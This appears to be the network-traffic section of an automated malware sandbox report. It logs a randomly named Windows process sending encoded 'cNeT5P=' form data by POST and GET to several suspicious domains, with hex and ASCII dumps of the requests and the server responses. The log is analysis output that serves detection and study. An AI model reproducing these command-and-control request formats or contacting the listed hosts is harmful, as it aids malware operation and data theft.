                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=/3r+tUE/vSKrqX58LjTodRVpZBlHHxcDf7+yOl16HQ/wJ6MPdg5z0hge0vdoXF0g2xi3rTvJdGS80lrmJsNHJWpuCwh3d5ejZVLs8+MbEJc2MF98nw70VE7gVfsD3aEh4HXKx1riIUOEaxKY6KLoiQotveZQ4cLBFUZ2WasCMQ4eJiEVHxk9DpBC8pFR6E8L8R8JbY/wN8N4wi0Z+DfTxxmv2vefQ+YmQp+KRsU=
                              Dec 2, 2024 15:54:51.148338079 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Mon, 02 Dec 2024 14:54:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Trace: 2B530CFD9BB47414204151692DDDCA75D165461BC9FB428C36B5F892C100
                              Set-Cookie: _csrf=7f736ae0f0bba6261ca88e0fc347fe4a5174a935a4ba041b4002b99a58c34582a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22r2jNNJVMFYV4GWv34yKFNMTVnwFsBemT%22%3B%7D; path=/; HttpOnly
                              Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="hMP9NqzntfU19liyuBSNw9FCopc06tdZl5O2-Y87DwP28Zd44q3juHOvDob_Q_vw5Tvp0Xqngw_55PCKzV5iVw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                              Dec 2, 2024 15:54:51.148392916 CET | 18 | IN | Data Ascii: y></html>0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              7 | 192.168.2.7 | 49914 | 47.254.140.255 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:54:52.516985893 CET | 1821 | OUT | POST /i7qk/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.yvcp3.info
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.yvcp3.info
                              Referer: http://www.yvcp3.info/i7qk/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:54:53.921353102 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Mon, 02 Dec 2024 14:54:53 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Trace: 2BCC2A97F9F43961E187F1AC0958ABE28EA76C523C0358318228E2AB9100
                              Set-Cookie: _csrf=e32ce2e337cdafab5262e81f972d0561a8e5600416a6b35fc1ac9c8403676b34a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ZzJmC4xPaoXs4fYl7Cmw8mILafOQwnch%22%3B%7D; path=/; HttpOnly
                              Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="gvl7aflWAjfUYiSMIDlnYg5tUuC9d6KV5BOgg7_DKmfYgzEEumJ6Z7UNfP8UXz4OOS4_l4Ua69mFde_SyK1JDw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                              Dec 2, 2024 15:54:53.921370029 CET | 18 | IN | Data Ascii: y></html>0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              8 | 192.168.2.7 | 49922 | 47.254.140.255 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:54:55.176253080 CET | 525 | OUT | GET /i7qk/?cNeT5P=y1Deuhcniwy3qxxQAmTyamEbBAp7BzgQf56uDV1XLiTDd60qTBhOzyQcu/peRmYp6AfM2zjHYnfo1VupJPImU0UbKzMKFpXAJ3iP9s5hV6VkbgV3kS/JEHHqfdUXmoMZ21WIq3bcKVXK&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.yvcp3.info
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:54:56.495243073 CET | 1236 | IN | HTTP/1.1 404 Not Found
                              Server: nginx/1.20.1
                              Date: Mon, 02 Dec 2024 14:54:56 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              X-Trace: 2BEB43DAAEC668390AC153CCDDD6DBC7205EACFB43E5DF8D5961B1191300
                              Set-Cookie: _csrf=ccd8c6a513d00a64832473e71c5e1bc379d4f2fa5e9474d042d5bf6e74078e07a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%228gWEDL94uI6FbE5LMScuy2GFdUSR_4lh%22%3B%7D; path=/; HttpOnly
                              Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="csrf-param" content="_csrf"> <meta name="csrf-token" content="c92aZsVowOAqlCFsmBg0sDIGOyFHjgO0HIk3X7bOZWtLus0jgST51F_dFyr6XQH8f1VYVD68RPJ43GQN6foJAw=="> <title>Not Found (#404)</title> <link href="/css/site.css" rel="stylesheet"></head><body><div class="wrap"> <div class="site-error"> <h1>Not Found (#404)</h1> <div class="alert alert-danger"> Page not found. </div> <p> The above error occurred while the Web server was processing your request. </p> <p> Please contact us if you think this is a server error. Thank you. </p></div></div></bod
                              Dec 2, 2024 15:54:56.495335102 CET | 18 | IN | Data Ascii: y></html>0


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              9 | 192.168.2.7 | 49937 | 208.91.197.27 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:02.562170982 CET | 806 | OUT | POST /rfhq/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.guacamask.online
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.guacamask.online
                              Referer: http://www.guacamask.online/rfhq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Ascii: cNeT5P=bAOfieiFlcV8diecoqFLjV2X+5sjNAf4Ac/eZrxGKo4XudCq8pbqanlgOnA94Wr58zEKj1JX0R8eaC3cbf7tfSS/cW8l9AoiBVDitBH6XXpiEhjhraFqQkGnEatEF+T7eYpImTCD1UUXDsqUpLSyTOgP0SBQYXQUpkv/5hl0h6bZ54/CQ2syfTjqf9sdsAhwRkFcoVH8kqoy6lKdqQ==


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              10 | 192.168.2.7 | 49945 | 208.91.197.27 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:05.228801012 CET | 826 | OUT | POST /rfhq/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.guacamask.online
                              Connection: close
                              Content-Length: 239
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.guacamask.online
                              Referer: http://www.guacamask.online/rfhq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 62 41 4f 66 69 65 69 46 6c 63 56 38 63 44 75 63 76 4c 46 4c 33 46 32 51 37 35 73 6a 43 67 66 30 41 63 37 65 5a 76 42 6f 4c 65 6f 58 76 38 79 71 39 71 44 71 55 48 6c 67 47 48 41 34 6d 6d 72 45 38 30 4d 64 6a 31 31 58 30 52 34 65 61 47 7a 63 59 73 44 69 63 69 53 35 51 32 38 6e 7a 67 6f 69 42 56 44 69 74 41 6e 55 58 54 4e 69 46 51 54 68 72 2b 52 70 4f 55 47 6b 46 61 74 45 42 2b 53 38 65 59 70 36 6d 53 65 6c 31 57 38 58 44 70 47 55 70 65 2b 74 5a 4f 67 46 77 53 41 64 5a 45 41 61 6c 78 54 71 68 42 35 57 37 59 48 53 38 4f 2b 67 4b 55 67 65 42 43 62 52 62 2f 49 72 37 6d 38 46 54 6c 42 45 6c 33 7a 64 37 64 4e 59 33 33 72 5a 38 68 6e 44 54 30 79 6f 70 4e 6c 31 4c 7a 51 4a 7a 34 30 32 48 69 34 3d
                              Data Ascii: cNeT5P=bAOfieiFlcV8cDucvLFL3F2Q75sjCgf0Ac7eZvBoLeoXv8yq9qDqUHlgGHA4mmrE80Mdj11X0R4eaGzcYsDiciS5Q28nzgoiBVDitAnUXTNiFQThr+RpOUGkFatEB+S8eYp6mSel1W8XDpGUpe+tZOgFwSAdZEAalxTqhB5W7YHS8O+gKUgeBCbRb/Ir7m8FTlBEl3zd7dNY33rZ8hnDT0yopNl1LzQJz402Hi4=


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              11 | 192.168.2.7 | 49951 | 208.91.197.27 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:07.906657934 CET | 1839 | OUT | POST /rfhq/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.guacamask.online
                              Connection: close
                              Content-Length: 1251
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.guacamask.online
                              Referer: http://www.guacamask.online/rfhq/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 62 41 4f 66 69 65 69 46 6c 63 56 38 63 44 75 63 76 4c 46 4c 33 46 32 51 37 35 73 6a 43 67 66 30 41 63 37 65 5a 76 42 6f 4c 65 67 58 75 4f 36 71 38 4b 2f 71 58 48 6c 67 49 6e 41 35 6d 6d 72 6a 38 31 70 31 6a 31 35 48 30 58 6b 65 61 6a 6e 63 64 64 44 69 48 79 53 35 59 57 38 6d 39 41 6f 37 42 56 54 59 74 41 58 55 58 54 4e 69 46 54 4c 68 74 71 46 70 4d 55 47 6e 45 61 74 49 46 2b 53 59 65 63 46 71 6d 53 61 54 32 6d 63 58 44 4a 57 55 72 73 47 74 45 65 67 44 39 79 42 4f 5a 45 4e 59 6c 31 37 78 68 43 6c 73 37 59 2f 53 2f 5a 58 43 52 67 6f 44 44 67 36 4d 52 38 6b 4a 36 77 6b 52 54 7a 34 35 6c 30 72 6b 2b 2b 5a 65 35 31 54 34 2b 32 32 61 4d 46 43 73 76 39 4e 4c 43 32 78 78 6e 59 64 30 65 6e 35 57 41 6a 77 72 47 6f 67 34 46 38 68 70 55 51 53 39 6d 66 46 6f 4a 32 73 76 38 38 52 6f 7a 42 4e 52 2f 48 74 61 36 6b 74 71 59 63 66 72 33 66 4f 6d 55 63 34 65 34 5a 55 75 61 4a 6b 76 68 42 78 4b 51 35 74 6a 4e 68 67 42 50 43 6b 65 54 77 41 61 51 52 47 55 4c 66 52 74 41 67 78 66 31 38 53 62 45 6b 65 [TRUNCATED]
                              Data Ascii: cNeT5P=[TRUNCATED]


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              12 | 192.168.2.7 | 49957 | 208.91.197.27 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:10.568321943 CET | 531 | OUT | GET /rfhq/?cNeT5P=WCm/hpCimsJ9ehq7lKIv1VDyybMiIAv0Npn9YOFuJ9oZ3M+13oCVUFgjBEgQ3CHtpzgI5GBo5BBlGxqkDMLBAjerblAclHQGQEfPlkiGRydIYVrfr9hJQmq7K5VDFfSeZPk99y6g9Hkc&l0W=Yh8P HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Host: www.guacamask.online
                              Connection: close
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Dec 2, 2024 15:55:12.428277016 CET | 1236 | IN | HTTP/1.1 200 OK
                              Date: Mon, 02 Dec 2024 14:55:11 GMT
                              Server: Apache
                              Referrer-Policy: no-referrer-when-downgrade
                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                              Set-Cookie: vsid=902vr480696911733713151; expires=Sat, 01-Dec-2029 14:55:11 GMT; Max-Age=157680000; path=/; domain=www.guacamask.online; HttpOnly
                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_XCGSFDhjoG0vWsR0MDEmI5gTJysiLu9+TwY/Oj0If0Q97r2L5SY8zJQHZCFYhqXJ9HzyJjYgYbNggQ0eQnd1tQ==
                              Transfer-Encoding: chunked
                              Content-Type: text/html; charset=UTF-8
                              Connection: close
                              Data Raw: 31 39 63 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74
                              Data Ascii: 19c6b<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net
                              Dec 2, 2024 15:55:12.428318977 CET | 109 | IN | Data Raw: 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e
                              Data Ascii: "> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprApp
                              Dec 2, 2024 15:55:12.428421021 CET | 1236 | IN | Data Raw: 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 22 20 69 6e 20 77 69 6e 64 6f 77 29 7b 77 69 6e 64 6f 77 2e 67 64 70 72 41 70 70 6c 69 65 73 47 6c 6f 62 61 6c 6c 79 3d 74 72 75 65 7d 69 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c
                              Data Ascii: liesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host"
                              Dec 2, 2024 15:55:12.428471088 CET | 1236 | IN | Data Raw: 22 29 7b 72 65 74 75 72 6e 20 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 7d 76 61 72 20 67 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 73 75 70 70 6f 72 74 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66
                              Data Ascii: "){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,
                              Dec 2, 2024 15:55:12.428482056 CET | 1236 | IN | Data Raw: 6f 55 70 70 65 72 43 61 73 65 28 29 29 7b 6f 3d 22 65 6e 22 3b 62 72 65 61 6b 7d 7d 7d 62 3d 22 5f 22 2b 6f 7d 66 75 6e 63 74 69 6f 6e 20 78 28 69 2c 65 29 7b 76 61 72 20 77 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74
                              Data Ascii: oUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,999
                              Dec 2, 2024 15:55:12.428654909 CET | 1236 | IN | Data Raw: 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 69 66 28 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 26 26 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e
                              Data Ascii: pe="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")
                              Dec 2, 2024 15:55:12.428668022 CET | 1236 | IN | Data Raw: 6e 64 6f 77 26 26 22 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 22 20 69 6e 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 63 6d 70 5f 75 6c 74 72 61 62 6c 6f 63 6b 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77
                              Data Ascii: ndow&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-
                              Dec 2, 2024 15:55:12.428678989 CET | 1236 | IN | Data Raw: 69 66 28 61 2e 6c 65 6e 67 74 68 3d 3d 34 26 26 61 5b 33 5d 3d 3d 3d 66 61 6c 73 65 29 7b 61 5b 32 5d 28 7b 7d 2c 66 61 6c 73 65 29 7d 65 6c 73 65 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d
                              Data Ascii: if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usu
                              Dec 2, 2024 15:55:12.428690910 CET | 1236 | IN | Data Raw: 68 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 61 3d 74 79 70 65 6f 66 20 64 2e 64 61 74 61 3d 3d 3d 22 73 74 72 69 6e 67 22 3b 74 72 79 7b 76 61 72 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a
                              Data Ascii: handler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpRe
                              Dec 2, 2024 15:55:12.428719997 CET | 1236 | IN | Data Raw: 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 77 69 6e 64 6f 77 5b 61 5d 21 3d 3d 6e 75 6c 6c 29 29 29 7b 77 69 6e 64 6f 77 5b 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f
                              Data Ascii: peof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(type
                              Dec 2, 2024 15:55:12.548871040 CET | 1236 | IN | Data Raw: 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 75 61 63 61 6d 61 73 6b 2e 6f 6e 6c 69 6e 65 2f
                              Data Ascii: js?ch=1"></script><script type="text/javascript" src="http://www.guacamask.online/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              13 | 192.168.2.7 | 49977 | 104.21.24.198 | 80 | 5312 | C:\Program Files (x86)\rGEIMLZbgaGZJLqmWXphWFIBsYNYvxtrgfexyBZsKALJUSAVtLiXsDJNbDzeZBmcQVDxejW\IGcdoWhymz.exe
                              Timestamp | Bytes transferred | Direction | Data
                              Dec 2, 2024 15:55:18.578898907 CET | 815 | OUT | POST /jt56/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                              Accept-Language: en-US,en;q=0.9
                              Accept-Encoding: gzip, deflate, br
                              Host: www.supernutra01.online
                              Connection: close
                              Content-Length: 219
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.supernutra01.online
                              Referer: http://www.supernutra01.online/jt56/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; Moto G Build/LMY48G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.90 Mobile Safari/537.36
                              Data Raw: 63 4e 65 54 35 50 3d 36 4e 71 6a 49 2b 76 79 6b 48 78 31 33 65 72 73 6d 63 75 69 68 76 68 34 56 79 4c 63 49 75 33 49 78 6e 6c 71 58 46 32 33 44 65 47 4a 7a 79 45 30 42 6d 37 46 38 53 79 67 39 2b 6a 6b 48 38 55 6e 75 37 30 70 38 49 4d 70 6e 71 58 43 6f 6b 7a 74 4e 4b 6c 4e 57 77 39 56 6e 53 34 77 56 2b 36 4d 55 37 2b 38 68 4d 6f 42 49 65 2b 7a 78 6c 47 41 44 4c 34 64 51 5a 6b 69 2f 2f 56 7a 4f 71 4d 32 79 38 32 70 6d 4e 55 51 38 50 53 54 44 7a 33 42 39 69 69 67 42 45 4f 31 2b 6f 2f 7a 76 34 63 6b 6c 62 2f 67 35 58 59 6a 38 33 33 6b 43 33 45 78 6b 41 51 78 77 77 51 35 54 2b 54 4f 68 65 42 6f 37 62 47 48 36 7a 77 37 45 39 57 56 62 53 54 35 69 41 3d 3d
                              Data Ascii: cNeT5P=6NqjI+vykHx13ersmcuihvh4VyLcIu3IxnlqXF23DeGJzyE0Bm7F8Syg9+jkH8Unu70p8IMpnqXCokztNKlNWw9VnS4wV+6MU7+8hMoBIe+zxlGADL4dQZki//VzOqM2y82pmNUQ8PSTDz3B9iigBEO1+o/zv4cklb/g5XYj833kC3ExkAQxwwQ5T+TOheBo7bGH6zw7E9WVbST5iA==
                              Dec 2, 2024 15:55:19.954665899 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                              Date: Mon, 02 Dec 2024 14:55:19 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQfmTPM0FPwTAY6udyOtTjbarkbiKdKCho%2Ffq8gDoLtT7T9OYOCh6jWlwdS%2BrYL99aweMXJq6Kl4ZLG9n1cM8Dm4baYk%2FeWtKuEDgAtcyIw5YRFLO6BgwpdRll0uAIrFRYVO%2BfqMRMmBrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8ebc2843481642f1-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2744&min_rtt=2744&rtt_var=1372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
